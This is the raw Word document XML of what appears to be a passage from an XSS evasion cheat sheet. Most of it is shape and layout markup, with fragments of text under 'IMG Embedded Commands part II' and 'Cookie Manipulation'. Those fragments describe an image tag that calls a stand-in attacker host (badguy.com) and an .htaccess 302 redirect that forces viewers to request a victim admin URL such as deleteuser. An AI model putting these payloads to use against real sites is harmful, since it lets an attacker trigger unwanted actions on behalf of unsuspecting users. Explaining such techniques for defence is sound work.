                        <wps:cNvPr id="642" name="Freeform 644"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="7327" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8920 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 7327"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 7327"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 7327"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 7327"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 7327"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 7327"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 7327"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8920 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 7327"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8941 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 7327"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8941 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 7327"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8923 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 7327"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8920 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 7327"/>
                              <a:gd name="T46" fmla="+- 0 422 240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327" h="183">
                                <a:moveTo>
                                  <a:pt x="730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306" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7327" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7327" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7309" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730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39"/>
                            <a:ext cx="73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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId48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</w:t>
                                </w:r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ttp://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode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2" o:spid="_x0000_s1788" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:366.35pt;height:9.15pt;z-index:-15595008;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="73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">
                <v:shape id="Freeform 644" o:spid="_x0000_s1789" style="position:absolute;left:1614;top:239;width:7327;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="73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VEscYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IEb3VjsFajq7SVgMVSqApeH9ln&#10;kjb7NmS3Jvn3bqHgcZiZb5jVpjOVuFLjSssKJuMIBHFmdcm5gtMxfZyDcB5ZY2WZFPTkYLN+GKww&#10;0bblL7oefC4ChF2CCgrv60RKlxVk0I1tTRy8i20M+iCbXOoG2wA3lYyjaCYNlhwWCqzpraDs5/Br&#10;FOB5cZ7Gr6f3erH/eDLbPv1+/kyVGg27lyUIT52/h//bO61gNo3h70w4AnJ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VEscYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m7306,182l21,182r-3,l,161r,-3l,21,21,,7306,r21,21l7327,161r-18,21l7306,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7306,422;21,422;18,422;0,401;0,398;0,261;21,240;7306,240;7327,261;7327,401;7309,422;7306,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 643" o:spid="_x0000_s1790" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:73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19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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId49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</w:t>
                          </w:r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ttp://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode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9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="102"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>IMG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Embedded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Commands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part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II</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="347"/>
      </w:pP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scary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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absolutely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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identifiers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make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look</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>suspicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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hosted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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own</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>domain.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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uses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302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304</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(others</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>too)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redirect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image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>back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command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3775"/>
        </w:tabs>
        <w:spacing w:line="187" w:lineRule="exact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61536" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1379855</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1921510" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="638" name="Group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1510" cy="116205"/>
                          <a:chOff x="2173" y="1"/>
                          <a:chExt cx="3026" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="639" name="Freeform 641"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2173" y="0"/>
                            <a:ext cx="3026" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5178 2173"/>
                              <a:gd name="T1" fmla="*/ T0 w 3026"/>
                              <a:gd name="T2" fmla="+- 0 183 1"/>
                              <a:gd name="T3" fmla="*/ 183 h 183"/>
                              <a:gd name="T4" fmla="+- 0 2194 2173"/>
                              <a:gd name="T5" fmla="*/ T4 w 3026"/>
                              <a:gd name="T6" fmla="+- 0 183 1"/>
                              <a:gd name="T7" fmla="*/ 183 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2191 2173"/>
                              <a:gd name="T9" fmla="*/ T8 w 3026"/>
                              <a:gd name="T10" fmla="+- 0 183 1"/>
                              <a:gd name="T11" fmla="*/ 183 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2173 2173"/>
                              <a:gd name="T13" fmla="*/ T12 w 3026"/>
                              <a:gd name="T14" fmla="+- 0 162 1"/>
                              <a:gd name="T15" fmla="*/ 162 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2173 2173"/>
                              <a:gd name="T17" fmla="*/ T16 w 3026"/>
                              <a:gd name="T18" fmla="+- 0 159 1"/>
                              <a:gd name="T19" fmla="*/ 159 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2173 2173"/>
                              <a:gd name="T21" fmla="*/ T20 w 3026"/>
                              <a:gd name="T22" fmla="+- 0 22 1"/>
                              <a:gd name="T23" fmla="*/ 22 h 183"/>
                              <a:gd name="T24" fmla="+- 0 2194 2173"/>
                              <a:gd name="T25" fmla="*/ T24 w 3026"/>
                              <a:gd name="T26" fmla="+- 0 1 1"/>
                              <a:gd name="T27" fmla="*/ 1 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5178 2173"/>
                              <a:gd name="T29" fmla="*/ T28 w 3026"/>
                              <a:gd name="T30" fmla="+- 0 1 1"/>
                              <a:gd name="T31" fmla="*/ 1 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5199 2173"/>
                              <a:gd name="T33" fmla="*/ T32 w 3026"/>
                              <a:gd name="T34" fmla="+- 0 22 1"/>
                              <a:gd name="T35" fmla="*/ 22 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5199 2173"/>
                              <a:gd name="T37" fmla="*/ T36 w 3026"/>
                              <a:gd name="T38" fmla="+- 0 162 1"/>
                              <a:gd name="T39" fmla="*/ 162 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5181 2173"/>
                              <a:gd name="T41" fmla="*/ T40 w 3026"/>
                              <a:gd name="T42" fmla="+- 0 183 1"/>
                              <a:gd name="T43" fmla="*/ 183 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5178 2173"/>
                              <a:gd name="T45" fmla="*/ T44 w 3026"/>
                              <a:gd name="T46" fmla="+- 0 183 1"/>
                              <a:gd name="T47" fmla="*/ 18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026" h="183">
                                <a:moveTo>
                                  <a:pt x="30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005" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3026" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3026" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3008" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30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Text Box 640"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2173" y="0"/>
                            <a:ext cx="302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4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SRC="httx://badguy.com/a.jpg"&gt;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9" o:spid="_x0000_s1791" style="position:absolute;left:0;text-align:left;margin-left:108.65pt;margin-top:.05pt;width:151.3pt;height:9.15pt;z-index:-17554944;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2173,1" coordsize="302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">
                <v:shape id="Freeform 641" o:spid="_x0000_s1792" style="position:absolute;left:2173;width:3026;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="302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SWyccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE7wW/w/IKvYhuWkFtdJWiVLbixT8FvT2y&#10;r0kw+zZktzF++26h0OMwM79h5svOVqKlxpeOFTwPExDEmTMl5wpOx/fBFIQPyAYrx6TgTh6Wi97D&#10;HFPjbryn9hByESHsU1RQhFCnUvqsIIt+6Gri6H25xmKIssmlafAW4baSL0kylhZLjgsF1rQqKLse&#10;vq2C/ijoT7O+6LPtT7ptu9Efl51W6umxe5uBCNSF//BfWxsF49Er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0lsnHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m3005,182l21,182r-3,l,161r,-3l,21,21,,3005,r21,21l3026,161r-18,21l3005,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3005,183;21,183;18,183;0,162;0,159;0,22;21,1;3005,1;3026,22;3026,162;3008,183;3005,183" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 640" o:spid="_x0000_s1793" type="#_x0000_t202" style="position:absolute;left:2173;width:302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4lSsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6ljlFlNRWQDYTCs9eDx2by2&#10;weala6J2//1yEHb8+H6v1qPtxI0GbxwrmM8SEMSV04YbBcfy8+UdhA/IGjvHpOCXPKzzydMKM+3u&#10;XNDtEBoRQ9hnqKANoc+k9FVLFv3M9cSRq91gMUQ4NFIPeI/htpOvSZJKi4ZjQ4s9bVuqLoerVbA5&#10;cfFhfr7P+6IuTFkuEv5KL0o9T8fNEkSgMfyLH+6dVpC+xf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HiVK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4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6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SRC="httx://badguy.com/a.jpg"&gt;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normal</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>actually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attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>commands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who</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:t>views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image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>link.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Here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.htaccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(under</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Apache)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>line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accomplish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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(thanks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Timo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part</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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this):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2198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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3364230" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="635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4230" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="5298" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="636" name="Freeform 638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5298" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6891 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5298"/>
                              <a:gd name="T2" fmla="+- 0 347 165"/>
                              <a:gd name="T3" fmla="*/ 347 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5298"/>
                              <a:gd name="T6" fmla="+- 0 347 165"/>
                              <a:gd name="T7" fmla="*/ 347 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5298"/>
                              <a:gd name="T10" fmla="+- 0 347 165"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5298"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5298"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5298"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5298"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6891 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5298"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6912 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5298"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6912 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5298"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6894 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5298"/>
                              <a:gd name="T42" fmla="+- 0 347 165"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6891 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5298"/>
                              <a:gd name="T46" fmla="+- 0 347 165"/>
                              <a:gd name="T47" fmla="*/ 34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298" h="183">
                                <a:moveTo>
                                  <a:pt x="5277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277" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5298" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5298" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5280" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="527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529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Redirect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302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/a.jpg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hyperlink r:id="rId50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http://victimsite.com/admin.asp&amp;deleteuser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6" o:spid="_x0000_s1794" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:264.9pt;height:9.15pt;z-index:-15594496;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="5298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">
                <v:shape id="Freeform 638" o:spid="_x0000_s1795" style="position:absolute;left:1614;top:165;width:5298;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="529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wB4MYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3pqNSoNE11CUYIVeqh7a2zP7&#10;TGKzb2N2jem/7xYKPQ4z8w2zzAbTiJ46V1tWMIliEMSF1TWXCo6H/GkOwnlkjY1lUvBNDrLV6GGJ&#10;qbZ3fqd+70sRIOxSVFB536ZSuqIigy6yLXHwzrYz6IPsSqk7vAe4aeQ0jhNpsOawUGFL64qKr/3N&#10;KJhuN/z5lp+et5frbXe45u2HLndKPY6HlwUIT4P/D/+1X7WCZJbA75lwBO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ewB4MYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m5277,182l21,182r-3,l,161r,-3l,21,21,,5277,r21,21l5298,161r-18,21l5277,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5277,347;21,347;18,347;0,326;0,323;0,186;21,165;5277,165;5298,186;5298,326;5280,347;5277,347" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 637" o:spid="_x0000_s1796" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:5298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HOQ8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nRTC6mNriLSQqFQTOKhx2f2&#10;mSxm38bsVtN/3xUKHoeZ+YZZrgfbigv13jhW8DRNQBBXThuuFezL98kchA/IGlvHpOCXPKxX49ES&#10;M+2unNOlCLWIEPYZKmhC6DIpfdWQRT91HXH0jq63GKLsa6l7vEa4beUsSVJp0XBcaLCjbUPVqfix&#10;CjbfnL+Z89dhlx9zU5avCX+mJ6UeH4bNAkSgIdzD/+0PrSB9fo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8c5D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Redirect</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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302</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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/a.jpg</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="52"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:hyperlink r:id="rId51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http://victimsite.com/admin.asp&amp;deleteuser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Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5913"/>
        </w:tabs>
        <w:spacing w:before="101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62048" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4342765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="316865" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="632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865" cy="116205"/>
                          <a:chOff x="6839" y="107"/>
                          <a:chExt cx="499" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="633" name="Freeform 635"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6838" y="107"/>
                            <a:ext cx="499" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7316 6839"/>
                              <a:gd name="T1" fmla="*/ T0 w 499"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6860 6839"/>
                              <a:gd name="T5" fmla="*/ T4 w 499"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6857 6839"/>
                              <a:gd name="T9" fmla="*/ T8 w 499"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6839 6839"/>
                              <a:gd name="T13" fmla="*/ T12 w 499"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6839 6839"/>
                              <a:gd name="T17" fmla="*/ T16 w 499"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6839 6839"/>
                              <a:gd name="T21" fmla="*/ T20 w 499"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6860 6839"/>
                              <a:gd name="T25" fmla="*/ T24 w 499"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7316 6839"/>
                              <a:gd name="T29" fmla="*/ T28 w 499"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7337 6839"/>
                              <a:gd name="T33" fmla="*/ T32 w 499"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7337 6839"/>
                              <a:gd name="T37" fmla="*/ T36 w 499"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7319 6839"/>
                              <a:gd name="T41" fmla="*/ T40 w 499"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7316 6839"/>
                              <a:gd name="T45" fmla="*/ T44 w 499"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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99" h="183">
                                <a:moveTo>
